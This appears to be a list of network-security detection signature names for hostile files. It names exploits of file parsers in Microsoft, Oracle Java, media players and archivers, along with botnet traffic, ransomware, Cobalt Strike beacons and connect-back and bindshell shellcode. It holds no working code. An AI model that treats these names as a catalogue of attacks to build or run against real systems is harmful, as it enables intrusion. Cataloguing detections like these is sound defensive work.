File-Binary_Gzip-Compressed-File-Download
File-Binary_Gzip-Compressed-File-Upload
File-Binary_Gzip-Compressed-File-With-Invalid-CRC
File-Binary_Gzip-Compressed-File-With-Reserved-Flag-Bit-Set
File-Binary_HPE-7-Zip-Rar-Solid-Compression-Remote-Code-Execution
File-Binary_HPE-IMC-Topomsgservlet-Classname-Expression-Language-Injection
File-Binary_HPE-Intelligent-Management-Center-Accessmgrservlet-Classname-Insecure-Deserialization
File-Binary_HPE-Intelligent-Management-Center-Perfaccessmgrservlet-Insecure-Deserialization
File-Binary_HPE-Intelligent-Management-Center-Topodebugservlet-Insecure-Deserialization
File-Binary_HPE-Network-Automation-RPCServlet-Insecure-Deserialization
File-Binary_HTTP-404-With-Binary-Content
File-Binary_IBM-Domino-Image-File-Parsing-CVE-2015-5040-Buffer-Overflow
File-Binary_IBM-Java-Com.ibm.rmi.util.proxyutil-Sandbox-Breach
File-Binary_IBM-Java-Java.lang.classloader.defineclass-Sandbox-Breach
File-Binary_IBM-Java-Multiple-Packages-Sandbox-Breach
File-Binary_IBM-Lotus-Domino-BMP-Color-Palette-Stack-Buffer-Overflow
File-Binary_IBM-Lotus-Domino-BMP-Parsing-Integer-Overflow
File-Binary_IBM-Lotus-Notes-1-2-3-Work-Sheet-File-Viewer-Buffer-Overflow
File-Binary_IBM-Lotus-Notes-Doc-Attachment-Viewer-Buffer-Overflow
File-Binary_IBM-Lotus-Notes-WPD-Attachment-Handling-Buffer-Overflow
File-Binary_Imagemagick-Psd-File-Channel-Buffer-Vulnerability
File-Binary_Imagemagick-Sgi-File-Malformed-BPC-Field-Handling-Buffer-Overflow
File-Binary_Imagemagick-Sgi-File-Malformed-ZSIZE-Field-Handling-Buffer-Overflow
File-Binary_Inductive-Automation-Ignition-Servermessage-Insecure-Deserialization
File-Binary_Interactive-Data-Esignal-Stack-Buffer-Overflow
File-Binary_Internet-Explorer-BMP-BOF
File-Binary_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2021-26411
File-Binary_Invalid-Content-Type-For-VideoLAN-VLC-Media-Player
File-Binary_Java-Archive-File-Upload
File-Binary_Java-Class-File
File-Binary_Java-Color-Management-Component-Remote-Code-Execution
File-Binary_Java-Java.util.concurrent.concurrenthashmap-Memory-Corruption
File-Binary_Java-SE-Gsub-Featurecount-Buffer-Overflow
File-Binary_Jenkins-Arbitrary-File-Read-CVE-2024-23897
File-Binary_Keysight-N6854a-And-N6841a-RF-Addlicensefile-Directory-Traversal
File-Binary_Kronos-Botnet-Traffic
File-Binary_Kuluoz-Botnet-Traffic
File-Binary_Laquis-SCADA-LGX-Report-Addcombofile-Arbitrary-File-Write
File-Binary_Laquis-SCADA-LGX-Report-Arbitrary-File-Write
File-Binary_Laquis-Scada-LGX-Report-File-Parsing-Out-of-Bounds-Write
File-Binary_Laquis-SCADA-LGX-Report-String-Writetofile-Arbitrary-File-Write
File-Binary_Laquis-Scada-LGX-Report-Table-Save-Arbitrary-File-Write
File-Binary_LhArc-Archive
File-Binary_Libav-LZO-Integer-Overflow
File-Binary_Libextractor-ASF-Heap-Buffer-Overflow
File-Binary_Libflac-Picture-Metadata-Picture-Description-Size-Buffer-Overflow
File-Binary_Libmspack-Project-Cabd_Sys_Read_Block-Off-By-One
File-Binary_Libsndfile-PAF-File-Integer-Overflow
File-Binary_Libtiff-Jbigdecode-Heap-Buffer-Overflow
File-Binary_Libtiff-Tiff2pdf-Converter-Out-Of-Bounds-Read
File-Binary_Linux-Esxiargs-Ransomware
File-Binary_Lotus-1-2-3-Spreadsheet
File-Binary_Lotus-Notes-Lzh-Attachment-Viewer-Stack-Buffer-Overflow
File-Binary_Lupper-Worm-Download
File-Binary_Lz4-Archive
File-Binary_Mac-OS-X-Dmg-UFS-ffs_mountfs-Integer-Overflow
File-Binary_Mach-O-Executable-File-Transfer
File-Binary_Malicious-BMP-File-CVE-2009-2518
File-Binary_Malicious-Ico-File-Used-By-Trojans
File-Binary_Mapurltozone-Security-Feature-Bypass-CVE-2025-21247
File-Binary_Matroska-Media-Container
File-Binary_McAfee-Epolicy-Orchestrator-Datachannel-Guid-SQL-Injection
File-Binary_McAfee-Multiple-Products-Lha-Type-2-File-Handling-Buffer-Overflow
File-Binary_McAfee-VirusScan-On-Access-Scanner-Long-Unicode-Filename-Handling
File-Binary_Microsoft-Access-CVE-2013-3155
File-Binary_Microsoft-Access-CVE-2013-3156
File-Binary_Microsoft-Access-CVE-2013-3157-Memory-Corruption
File-Binary_Microsoft-ASF-Container
File-Binary_Microsoft-ATL-COM-Initialization
File-Binary_Microsoft-Cabinet-Transfer
File-Binary_Microsoft-Compiled-HTML-Help-Itss-Buffer-Overflow
File-Binary_Microsoft-DirectShow-MPEG-Layer-3-Audio-Decoder-Memory-Corruption
File-Binary_Microsoft-Embedded-Font-EOT-File-Reference
File-Binary_Microsoft-Embedded-OpenType-EOT-Font-Integer-Overflow
File-Binary_Microsoft-Embedded-OpenType-Font-Engine-Heap-Overflow
File-Binary_Microsoft-Embedded-OpenType-Font-Engine-Integer-Overflow
File-Binary_Microsoft-Excel-Heap-Corruption-Vulnerability
File-Binary_Microsoft-Excel-Legacy-Spreadsheet
File-Binary_Microsoft-Excel-Malformed-File-Format-Parsing-Code-Execution
File-Binary_Microsoft-Excel-Workspace-Index-Value-Memory-Corruption
File-Binary_Microsoft-Exchange-TNEF-Decoding-MS09-003-Buffer-Overflow
File-Binary_Microsoft-Graphics-Component-Createcolorspace-Information-Disclosure2
File-Binary_Microsoft-Graphics-Component-Createcolorspacew-Information-Disclosure
File-Binary_Microsoft-Graphics-Component-CVE-2016-0169-Information-Disclosure
File-Binary_Microsoft-Graphics-Component-CVE-2017-0025
File-Binary_Microsoft-Graphics-Component-CVE-2018-8396-Information-Disclosure
File-Binary_Microsoft-Graphics-Component-CVE-2018-8472-Information-Disclosure
File-Binary_Microsoft-Graphics-Device-Interface-CVE-2016-3263-Information-Disclosure
File-Binary_Microsoft-Graphics-Device-Interface-CVE-2018-8397-Code-Execution
File-Binary_Microsoft-Graphics-Device-Interface-CVE-2019-0619-Information-Disclosure
File-Binary_Microsoft-Graphics-Device-Interface-CVE-2019-0961-Information-Disclosure
File-Binary_Microsoft-Graphics-Device-Interface-Information-Disclosure-CVE-2019-0616
File-Binary_Microsoft-Graphics-Device-Interface-Wemrtext-Information-Disclosure
File-Binary_Microsoft-Graphics-Heap-Buffer-Overflow-Vulnerability-CVE-2018-1010
File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1012
File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1013
File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1015
File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1016
File-Binary_Microsoft-Hyper-V-Disk-Image
File-Binary_Microsoft-Internet-Explorer-Vector-Markup-Language-Vgx-Buffer-Overflow
File-Binary_Microsoft-Jet-Db-Engine-Buffer-Overflow
File-Binary_Microsoft-Malware-Protection-Engine-Rar-Vmsf_RGB-Memory-Corruption
File-Binary_Microsoft-Multiple-Products-TrueType-Font-Parsing-Memory-Corruption
File-Binary_Microsoft-Office-Cgm-Image-Converter-Buffer-Overflow
File-Binary_Microsoft-Office-CVE-2016-3318-Remote-Code-Execution
File-Binary_Microsoft-Office-CVE-2017-0014
File-Binary_Microsoft-Office-Image-Filter-Crafted-BMP-Header-Buffer-Overflow
File-Binary_Microsoft-Office-Jet-Engine-MDB-File-Parsing-Buffer-Overflow
File-Binary_Microsoft-Office-Pict-Filter-Invalid-Length-Memory-Corruption
File-Binary_Microsoft-Office-Pict-Filter-Map-Structure-Memory-Corruption
File-Binary_Microsoft-Office-Pict-Image-Converter-Integer-Overflow
File-Binary_Microsoft-Office-TIFF-Converter-Heap-Overflow-CVE-2010-3947
File-Binary_Microsoft-Office-Word-Wordperfect-Converter-Buffer-Overflow
File-Binary_Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658
File-Binary_Microsoft-OpenType-Font-Handling-Memory-Corruption
File-Binary_Microsoft-OpenType-Font-Index-Remote-Code-Execution
File-Binary_Microsoft-Outlook-Compressed-TNEF-RTF-Memory-Corruption
File-Binary_Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397
File-Binary_Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397-2
File-Binary_Microsoft-Outlook-Out-Of-Bounds-Vulnerability-CVE-2018-8587
File-Binary_Microsoft-Outlook-Rwz-CVE-2018-8587-Integer-Overflow
File-Binary_Microsoft-Outlook-Rwz-Integer-Overflow
File-Binary_Microsoft-Outlook-SMB-Attachment
File-Binary_Microsoft-Outlook-Smb-Attach_By_Reference-Code-Execution
File-Binary_Microsoft-Products-Uniscribe-Font-Parsing-Engine-Memory-Corruption
File-Binary_Microsoft-SQL-Server-Backup-Restoring-Memory-Corruption
File-Binary_Microsoft-Video-ActiveX-Buffer-Overflow-MS09-037-Malicious-Gif
File-Binary_Microsoft-Visual-Studio-DDS-File-Parsing-Heap-Buffer-Overflow
File-Binary_Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0091-Memory-Corruption
File-Binary_Microsoft-Windows-Ancillary-Function-Driver-Elevation-CVE-2011-1249
File-Binary_Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption-2
File-Binary_Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability
File-Binary_Microsoft-Windows-Briefcase-Integer-Overflow-Vulnerability
File-Binary_Microsoft-Windows-Briefcase-Integer-Underflow-Vulnerability
File-Binary_Microsoft-Windows-Cab-File-Parsing-Directory-Traversal
File-Binary_Microsoft-Windows-Compiled-Help
File-Binary_Microsoft-Windows-Devicemetadata-Path-Traversal
File-Binary_Microsoft-Windows-DVR-MS-CVE-2011-0042
File-Binary_Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-CVE-2018-0761
File-Binary_Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-Vulnerability
File-Binary_Microsoft-Windows-Fax-Cover-Sheet
File-Binary_Microsoft-Windows-Fax-Services-Cover-Editor-Memory-Corruption
File-Binary_Microsoft-Windows-Fax-Services-Cover-Page-Heap-Buffer-Overflow
File-Binary_Microsoft-Windows-Font-Library-Remote-Code-Execution
File-Binary_Microsoft-Windows-Font-Parsing-CVE-2012-2897
File-Binary_Microsoft-Windows-GDI-EMF-Image-File-Handling-Stack-Overflow
File-Binary_Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow
File-Binary_Microsoft-Windows-GDI-EMR_setpixelv-Handling-Information-Disclosure
File-Binary_Microsoft-Windows-GDI-Information-Disclosure
File-Binary_Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow
File-Binary_Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow-2
File-Binary_Microsoft-Windows-GDI-WMF-File-Headersize-Buffer-Overflow
File-Binary_Microsoft-Windows-Gdiplus-EMF-Handling-Integer-Overflow
File-Binary_Microsoft-Windows-Gdiplus-Gpfont.setdata-Integer-Overflow
File-Binary_Microsoft-Windows-Gdiplus-TIFF-Parsing-Buffer-Overflow
File-Binary_Microsoft-Windows-Gdiplus-WMF-Integer-Overflow
File-Binary_Microsoft-Windows-Graphics-Component-Createcolorspace-EMF-Out-Of-Bounds-Read
File-Binary_Microsoft-Windows-Graphics-Component-CVE-2016-3301-Code-Execution
File-Binary_Microsoft-Windows-Graphics-Component-CVE-2016-3303-Code-Execution
File-Binary_Microsoft-Windows-Graphics-Component-CVE-2016-3304-Code-Execution
File-Binary_Microsoft-Windows-Graphics-Component-CVE-2017-11816-Information-Disclosure
File-Binary_Microsoft-Windows-Graphics-Component-Information-Disclosure-CVE-2018-8239
File-Binary_Microsoft-Windows-Graphics-Component-Meta_Setdibtodev-Information-Disclosure
File-Binary_Microsoft-Windows-Graphics-Component-Remote-Code-Execution
File-Binary_Microsoft-Windows-Graphics-Device-Integer-Overflow-Vulnerability
File-Binary_Microsoft-Windows-Graphics-Device-Interface-EMR_Header-Information-Disclosure
File-Binary_Microsoft-Windows-Graphics-Device-Interface-Information-Disclosure
File-Binary_Microsoft-Windows-Graphics-Device-Interface-Integer-Overflow
File-Binary_Microsoft-Windows-Graphics-Device-Interface-Out-Of-Bounds-Access
File-Binary_Microsoft-Windows-Graphics-Rendering-Engine-EMF-Parsing-Memory-Corruption
File-Binary_Microsoft-Windows-Graphics-Rendering-Engine-WMF-Polygon-Parsing-BOF
File-Binary_Microsoft-Windows-GRE-WMF-Handling-Memory-Read-Exception
File-Binary_Microsoft-Windows-Help-Document
File-Binary_Microsoft-Windows-HLP-File-Handling-Heap-Buffer-Overflow
File-Binary_Microsoft-Windows-Image-ICC-Profile-Code-Execution
File-Binary_Microsoft-Windows-Imaging-API-Use-After-Free
File-Binary_Microsoft-Windows-Integer-Underflow-CVE-2015-6130
File-Binary_Microsoft-Windows-Itss.dll-CHM-File-Handling-Heap-Corruption
File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-0891-Remote-Code-Execution
File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1242-Remote-Code-Execution
File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1243-Remote-Code-Execution
File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1249-RCE
File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1250-RCE
File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1358-RCE
File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1359-Out-Of-Bounds-Write
File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1406-Off-By-One
File-Binary_Microsoft-Windows-Jet-Database-Engine-Code-Execution
File-Binary_Microsoft-Windows-Jet-Database-Engine-Createlvsmlocs-Code-Execution
File-Binary_Microsoft-Windows-Jet-Database-Engine-CVE-2020-1074-Remote-Code-Execution
File-Binary_Microsoft-Windows-Jet-Database-Engine-Physical-Index-Out-Of-Bounds-Read
File-Binary_Microsoft-Windows-Kodak-Image-Viewer-Code-Execution
File-Binary_Microsoft-Windows-Libarchive-Execute_Filter_e8-Integer-Overflow
File-Binary_Microsoft-Windows-Libarchive-Run_Filters-Heap-Buffer-Overflow
File-Binary_Microsoft-Windows-LNK-NTLM-Relay
File-Binary_Microsoft-Windows-LNK-Remote-Code-Execution
File-Binary_Microsoft-Windows-LNK-Remote-Code-Execution-CVE-2020-1421
File-Binary_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189
File-Binary_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219
File-Binary_Microsoft-Windows-Media-ASF-Header-Parsing-Invalid-Free
File-Binary_Microsoft-Windows-Media-CVE-2016-0101-Code-Execution
File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-JPEG
File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sig
File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Spread
File-Binary_Microsoft-Windows-Media-Format-ASF-Parsing-Code-Execution-Sum
File-Binary_Microsoft-Windows-Media-Foundation-Mfasfsrcsnk.dll-Type-Confusion
File-Binary_Microsoft-Windows-Media-MIDI-File-Memory-Corruption
File-Binary_Microsoft-Windows-Media-Playback-Memory-Corruption
File-Binary_Microsoft-Windows-Memory-Dump
File-Binary_Microsoft-Windows-Metafile
File-Binary_Microsoft-Windows-Metafile-Setpalette-Entries-Heap-Overflow
File-Binary_Microsoft-Windows-Metafile-Vulnerability-MS05-053
File-Binary_Microsoft-Windows-MF3216-Component-Heap-Based-Buffer-Overflow
File-Binary_Microsoft-Windows-MIDI-Remote-Code-Execution-Vulnerability
File-Binary_Microsoft-Windows-MOTW-Security-Feature-Bypass-CVE-2024-30050
File-Binary_Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628
File-Binary_Microsoft-Windows-OLE-CVE-2017-8487-Global-Buffer-Overflow
File-Binary_Microsoft-Windows-OpenType-Compact-Font-Format-BOF
File-Binary_Microsoft-Windows-OpenType-Font-Memory-Corruption
File-Binary_Microsoft-Windows-OpenType-Font-Parsing-Heap-Overflow
File-Binary_Microsoft-Windows-OpenType-Font-Parsing-Stack-Overflow
File-Binary_Microsoft-Windows-OpenType-Font-Validation-Integer-Overflow
File-Binary_Microsoft-Windows-OTF-Fonts-Kernel-Vulnerability-CVE-2015-2426
File-Binary_Microsoft-Windows-Remote-Code-Execution-CVE-2018-8475
File-Binary_Microsoft-Windows-Security-Feature-Bypass-CVE-2024-38217
File-Binary_Microsoft-Windows-StructuredQuery-RCE-Vulnerability-CVE-2018-0825
File-Binary_Microsoft-Windows-StructuredQuery-Uninitialized-Pointer-Remote-Code-Execution
File-Binary_Microsoft-Windows-TrueType-Font-File-Parsing-Remote-Code-Execution
File-Binary_Microsoft-Windows-TrueType-Font-Parsing-CVE-2011-3402
File-Binary_Microsoft-Windows-Uniscribe-Integer-Overflow
File-Binary_Microsoft-Windows-Wimgapi-Readintegrityinfo-Heap-Buffer-Overflow
File-Binary_Microsoft-Windows-Win32k-EOT-Parsing-Integer-Overflow
File-Binary_Microsoft-Windows-WMF-File-Parsing-DOS
File-Binary_Microsoft-Windows-WMF-Graphics-Render-Engine-Code-Execution
File-Binary_Microsoft-Windows-WMF-Graphics-Render-Engine-Code-Execution-2
File-Binary_Microsoft-Winhlp32-Compressed-Phrase-Integer-Overflow
File-Binary_Microsoft-Word-For-Macintosh-Version-5-Document
File-Binary_Microsoft-Word-GLB-File-Parsing-Out-of-Bounds-Write
File-Binary_Microsoft-Word-Legacy-Document
File-Binary_Microsoft-Wordperfect-5.x-Converter-Buffer-Overflow
File-Binary_Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-40487
File-Binary_Microsoft_Windows_Buffer_Over_Read_Vulnerability_CVE-2019-0758
File-Binary_Microsoft_Windows_Integer_Underflow_Issue_Vulnerability_CVE-2019-0903
File-Binary_Moneyshot-Shellcode-Arm-Linux-Execve
File-Binary_Moneyshot-Shellcode-Arm-Linux-Fdreuse
File-Binary_Moneyshot-Shellcode-Arm-NDS-Redscreen
File-Binary_Moneyshot-Shellcode-x86-64-Linux-Connectback
File-Binary_Moneyshot-Shellcode-x86-64-Linux-Shutdown
File-Binary_Moneyshot-Shellcode-x86-BSD-Binsh
File-Binary_Moneyshot-Shellcode-x86-Linux-Bindshell
File-Binary_Moneyshot-Shellcode-x86-Linux-Binsh
File-Binary_Moneyshot-Shellcode-x86-Linux-Connectback
File-Binary_Moneyshot-Shellcode-x86-Linux-Dup2
File-Binary_Moneyshot-Shellcode-x86-Linux-Exec
File-Binary_Moneyshot-Shellcode-x86-Linux-Fdreuse
File-Binary_Moneyshot-Shellcode-x86-Linux-Forkbomb
File-Binary_Moneyshot-Shellcode-x86-Linux-Write
File-Binary_Moneyshot-Shellcode-x86-Win32-Msgbox
File-Binary_Mozilla-Firefox-Woff-Font-Processing-Integer-Overflow
File-Binary_Mp3-Download
File-Binary_MPlayer-TwinVQ-File-Handling-Buffer-Overflow
File-Binary_MS-Windows-Embedded-OpenType-Font-Engine-Lzcomp-IOF
File-Binary_MS-Windows-TrueType-Font-Parsing-Vulnerability-CVE-2012-0159
File-Binary_MS-Word-Stack-Buffer-Overwrite-Vulnerability-CVE-2013-1324
File-Binary_MS-Word-Stack-Buffer-Overwrite-Vulnerability-CVE-2013-1325
File-Binary_Multiple-Mozilla-Products-Ogg-Vorbis-Decoding-Memory-Corruption
File-Binary_Multiple-Products-Malformed-Au-File-Divide-By-Zero-Denial-of-Service
File-Binary_Multiple-Vendor-Libwpd-Wp3tablesgroup-Heap-Overflow
File-Binary_Nipper-Buffer-Overflow-CVE-2019-17424
File-Binary_Nullsoft-Winamp-Advanced-Module-Format-File-Buffer-Overflow
File-Binary_Nullsoft-Winamp-AIFF-Parsing-Heap-Buffer-Overflow
File-Binary_Nullsoft-Winamp-Caf-File-Processing-Integer-Overflow
File-Binary_Nullsoft-Winamp-MIDI-File-Buffer-Overflow
File-Binary_Nullsoft-Winamp-MIDI-File-Header-Handling-Buffer-Overflow
File-Binary_Nullsoft-Winamp-MIDI-Timestamp-Stack-Buffer-Overflow
File-Binary_Nullsoft-Winamp-Ultravox-Streaming-Metadata-Parsing-Stack-BOF
File-Binary_Omron-Cx-One-Cx-Protocol-Cmessage-Type-Confusion
File-Binary_Omron-Cx-One-Cx-Protocol-Cscu-Type-Confusion
File-Binary_Omron-Cx-One-Cx-Protocol-Trace-Type-Confusion
File-Binary_Omron-Cx-One-Sba-File-Parsing-Wcscpy-Stack-Based-Buffer-Overflow
File-Binary_OneNote-Document
File-Binary_OpenOffice-EMF-File-EMR-BITBLT-Record-Integer-Overflow
File-Binary_OpenOffice-EMF-File-EMR-Record-Parsing-Integer-Overflow
File-Binary_OpenSSL-CMS-Structure-OriginatorInfo-Memory-Corruption
File-Binary_OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability
File-Binary_OpenSSL-Obj_obj2txt-Object-Identifier-Handling-Denial-Of-Service
File-Binary_Oracle-BI-Biremotingservlet-Amf-Insecure-Deserialization
File-Binary_Oracle-E-Business-Suite-Work-In-Process-SQL-Injection
File-Binary_Oracle-Java-2d-Imaginglib-Integer-Overflow
File-Binary_Oracle-Java-7-Applet-Remote-Code-Execution
File-Binary_Oracle-Java-Applet-Rhino-Script-Engine-Policy-Bypass
File-Binary_Oracle-Java-Awt_setpixels-Information-Disclosure
File-Binary_Oracle-Java-Com.sun.org.glassfish.external.statistics.impl-Package-Sandbox-Breach
File-Binary_Oracle-Java-Filedialog.show-Heap-Buffer-Overflow
File-Binary_Oracle-Java-Final-Field-Overwrite
File-Binary_Oracle-Java-Font-Parsing-maxPoints-Heap-Buffer-Overflow
File-Binary_Oracle-Java-Font-Parsing-Mort-Table-Ligature-Subtable-Buffer-Overflow
File-Binary_Oracle-Java-Java.awt.image.integercomponentraster-Memory-Corruption
File-Binary_Oracle-Java-Jmx-Findclass-And-Elementfromcomplex-Sandbox-Breach
File-Binary_Oracle-Java-PhantomReference-Use-After-Free
File-Binary_Oracle-Java-Private-Methodhandle-Sandbox-Bypass
File-Binary_Oracle-Java-Runtime-CMM-Readmabcurvedata-Buffer-Overflow
File-Binary_Oracle-Java-Runtime-Environment-Storeimagearray-Buffer-Overflow
File-Binary_Oracle-Java-Runtime-True-Type-Font-Idef-Opcode-Heap-Buffer-Overflow
File-Binary_Oracle-Java-Sandbox-Breach
File-Binary_Oracle-Java-SE-Gsub-Reqfeatureindex-Buffer-Overflow
File-Binary_Oracle-Java-SE-Ligature-Substitution-Glyph-Storage-Out-Of-Bounds-Memory-Access
File-Binary_Oracle-Java-SE-OCSP-Nextupdate-Replay-Attack
File-Binary_Oracle-Java-Security-Bybass-Vulnerability-CVE-2013-0422
File-Binary_Oracle-Java-Serviceloader-Exception-Handling-Sandbox-Bypass
File-Binary_Oracle-Java-Soundbank-Resource-Name-Stack-Buffer-Overflow
File-Binary_Oracle-Java-Sun.awt.image.imaginglib.lookupbytebi-Memory-Corruption
File-Binary_Oracle-Java-Sun.tracing.providerskeleton-Sandbox-Bypass
File-Binary_Oracle-Java-System.arraycopy-Race-Condition
File-Binary_Oracle-Java-Xgetsampleptrfromsnd-Memory-Corruption
File-Binary_Oracle-Outside-In-CVE-2013-5791
File-Binary_Oracle-Outside-In-Lotus-1-2-3-Heap-Buffer-Overflow
File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Denial-Of-Service
File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Heap-Buffer-Overflow
File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow
File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow-2
File-Binary_Oracle-Outside-In-Paradox-Database-Stream-Filter-Denial-Of-Service
File-Binary_Oracle-VirtualBox-Virtual-Disk-Image
File-Binary_Panda-AntiVirus-Zoo-Archive-Decompression-Buffer-Overflow
File-Binary_Path-Traversal-Via-Tar-Archive
File-Binary_Perl-Archive-Tar-Arbitrary-File-Overwrite
File-Binary_Php-EXIF-Extension-IFD_Make_Value-Thumbnail-Heap-Buffer-Overflow
File-Binary_Php-Phar_Parse_Tarfile-Method-Integer-Overflow
File-Binary_PHP-Phar_Set_inode-Function-Archive-Processing-Stack-Buffer-Overflow
File-Binary_Php-Tar-File-Parsing-Uninitialized-Reference
File-Binary_Pidgin-MSN-MSNP2P-Message-Integer-Overflow
File-Binary_Possible-Cobalt-Strike-Beacon-Download
File-Binary_Possible-Malware
File-Binary_Qt-BMP-Handling-Buffer-Overflow
File-Binary_Rar-File
File-Binary_RARLAB-UnRAR-Extractunixlink50-Directory-Traversal
File-Binary_RARLAB-WinRAR-ACE-Directory-Traversal
File-Binary_RARLAB-WinRAR-ACE-Remote-Code-Execution
File-Binary_RARLAB-WinRAR-Recovery-Volume-Out-Of-Bounds-Write
File-Binary_Raw-Disk-Image
File-Binary_RealMedia-Video
File-Binary_RealNetworks-Internet-Video
File-Binary_RealNetworks-RealPlayer-Ivr-BOF
File-Binary_RealNetworks-RealPlayer-Mp3-Files-Processing-Buffer-Overflow
File-Binary_RealPlayer-Malformed-RM-File-Heap-Overflow
File-Binary_RealPlayer-RealMedia-Security-Bypass
File-Binary_Realtek-Media-Player-Playlist-Buffer-Overflow
File-Binary_Red-Hat-Binary-Installation-Package
File-Binary_Red-Hat-Jboss-Application-Server-Dofilter-Insecure-Deserialization
File-Binary_Remote-Code-Execution-Via-Cpio-In-Zimbra-Collaboration-Suite-CVE-2022-41352
File-Binary_Rockwell-Automation-ISaGRAF-Workbench-7-ZIP-Directory-Traversal
File-Binary_Rockwell-Automation-Workbench-CCWARC-Insecure-Deserialization
File-Binary_Romfs-Disk-Image
File-Binary_Rpm-Package-Manager-Cpio-Header-Namesize-Integer-Overflow
File-Binary_Sality-NonP2P-A-Botnet-Traffic
File-Binary_SAP-3d-Visual-Enterprise-Viewer-3dm-File-Buffer-Overflow
File-Binary_SAP-3d-Visual-Enterprise-Viewer-Flic-Animation-Buffer-Overflow
File-Binary_Schneider-Electric-ClearSCADA-Opf-File-Parsing-Out-Of-Bounds-Array-Indexing
File-Binary_Schneider-Electric-Gp-Pro-EX-Parseapi-Heap-Buffer-Overflow
File-Binary_Shared-Variables
File-Binary_SketchUp-Pict-File-CVE-2013-3664
File-Binary_Smokeloader-A-Botnet-Traffic
File-Binary_Smokeloader-C-Botnet-Traffic
File-Binary_Sophos-Anti-Virus-Cab-File-Invalid-Folder-Count-Heap-Overflow
File-Binary_Sophos-Anti-Virus-CHM-File-Heap-Overflow
File-Binary_Standard-MIDI-Download
File-Binary_StuffIt-Archive
File-Binary_Sun-Java-Runtime-Environment-Classloader-Privilege-Escalation
File-Binary_Sun-Java-Runtime-Environment-Pack200-Decompression-Integer-Overflow
File-Binary_Sun-JRE-Pack200-Decompression-Integer-Overflow
File-Binary_Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption
File-Binary_SunBurst-TEARDROP-Detected-2
File-Binary_Suspicious-File
File-Binary_Suspicious-File-Name-In-Tar-Archive
File-Binary_Suspicious-Filename-In-Gzip-Compressed-Archive
File-Binary_Suspicious-Java-Serialized-Object
File-Binary_Suspicious-Link-Name-In-Tar-Archive
File-Binary_Suspicious-Long-Name-In-Gnu-Tar-Archive
File-Binary_Suspiciously-Large-Windows-Script-File
File-Binary_Symantec-AntiVirus-Engine-Rar-Decompression-Remote-Code-Execution
File-Binary_Symantec-AVE-Malformed-PE-Header-Memory-Access-Violation
File-Binary_Tar-Archive
File-Binary_Telestream-Flip4Mac-WMV-File-Parsing-Memory-Corruption
File-Binary_TIFF-File
File-Binary_Tinba-Botnet-Traffic
File-Binary_TomcatAJP-Request-Smuggling
File-Binary_Trimble-Navigation-SketchUp-BMP-File-Buffer-Overflow
File-Binary_Trimble-Navigation-SketchUp-Pict-File-Buffer-Overflow-2
File-Binary_Unidentified-Binary-From-A-Suspicious-Site
File-Binary_UPX-Packed-ELF-Executable
File-Binary_VideoLAN-VLC-Media-Player-Subtitle-Striptags-Heap-Buffer-Overflow
File-Binary_VideoLAN-VLC-Real.c-Readrealindex-Real-Demuxer-Integer-Overflow
File-Binary_VideoLAN-VLC-Ty-Processing-Buffer-Overflow
File-Binary_VLC-Media-Player-Plugins-Format-String-Vulnerabilities
File-Binary_VMware-Aria-Operations-For-Logs-Insecure-Deserialization-CVE-2023-20864
File-Binary_VMware-Virtual-Disk-Image
File-Binary_Wecon-LeviStudioU-Hft-File-Parsing-Stack-Buffer-Overflow
File-Binary_Wecon-LeviStudioU-Hft-File-Stack-Buffer-Overflow
File-Binary_Weintek-Easybuilder-Pro-Cmt-Series-Project-File-Directory-Traversal
File-Binary_WellinTech-KingView-Kingmess-Log-File-Parsing-Buffer-Overflow
File-Binary_Win32-OTF-Validation-Vulnerability
File-Binary_Winamp-Id3v2-Tag-Handling-Buffer-Overflow
File-Binary_Windows-Control-Panel-Applet-Shortcut-File-Transfer
File-Binary_Windows-Cryptographic-Services-Remote-Code-Execution-CVE-2023-23416
File-Binary_Windows-Elevation-Of-Privilege-CVE-2017-0024
File-Binary_Windows-Elevation-Of-Privilege-CVE-2017-0026
File-Binary_Windows-Elevation-Of-Privilege-CVE-2017-0050
File-Binary_Windows-Explorer-LNK-Remote-Code-Execution-Vulnerability-CVE-2017-8464
File-Binary_Windows-Graphics-Rendering-Engine-BMP-File-Parsing-Integer-Overflow
File-Binary_Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2025-21269
File-Binary_Windows-LNK-File-Transfer
